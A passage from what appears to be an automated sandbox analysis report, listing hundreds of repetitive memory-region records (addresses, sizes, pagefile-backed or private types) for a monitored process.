entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21969 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21970 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21971 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21972 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21973 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21974 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21975 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21976 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21977 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21978 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21979 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21980 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21981 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21982 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21983 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21984 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21985 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21986 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21987 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21988 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21989 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21990 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21991 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21992 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21993 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21994 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21995 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21996 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 21997 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 21998 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 21999 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22000 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22001 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22002 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22003 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22004 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22005 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22006 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22007 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22008 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22009 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22010 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22011 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22012 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22013 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22014 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22015 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22016 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22017 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22018 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22019 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22020 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22021 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22022 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22023 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22024 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22025 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22026 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22027 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22028 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22029 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22030 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22031 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22032 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22033 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22034 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22035 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22036 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22037 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22038 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22039 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22040 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22041 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22042 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22043 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22044 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22045 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22046 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22047 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22048 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22049 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22050 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22051 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22052 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22053 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22054 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22055 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22056 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22057 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22058 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22059 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22060 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22061 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22062 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22063 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22064 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22065 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22066 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22067 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22068 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22069 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22070 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22071 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22072 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22073 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22074 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22075 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 22076 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22077 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22078 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22079 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22080 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22081 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22082 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22083 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22084 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22085 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22086 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22087 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22088 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22089 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22090 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22091 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22092 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22093 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22094 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22095 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22096 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22097 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22098 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22099 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22100 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22101 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22102 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22103 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22104 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22105 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22106 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22107 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22108 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22109 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22110 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22111 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22112 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22113 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22114 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22115 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22116 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22117 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22118 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22119 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22120 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22121 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 22122 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22123 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22124 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22125 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22126 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22127 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22128 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22129 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22130 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22131 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 22132 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22133 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22134 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22135 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22136 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22137 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22138 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22139 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22140 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22141 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22142 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22143 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22144 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22145 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22146 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22147 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22148 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22149 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22150 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22151 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22152 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22153 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22154 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22155 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22156 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22157 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22158 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22159 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22160 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22161 start_va = 0x2100000 end_va = 0x2100fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000002100000" filename = "" Region: id = 22162 start_va = 0x570000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000570000" filename = "" Region: id = 22163 start_va = 0x4140000 end_va = 0x415ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004140000" filename = "" Region: id = 22164 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22165 start_va = 0x570000 end_va = 0x57efff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" filename = "" Region: id = 22166 start_va = 0x570000 end_va = 0x570fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000570000" 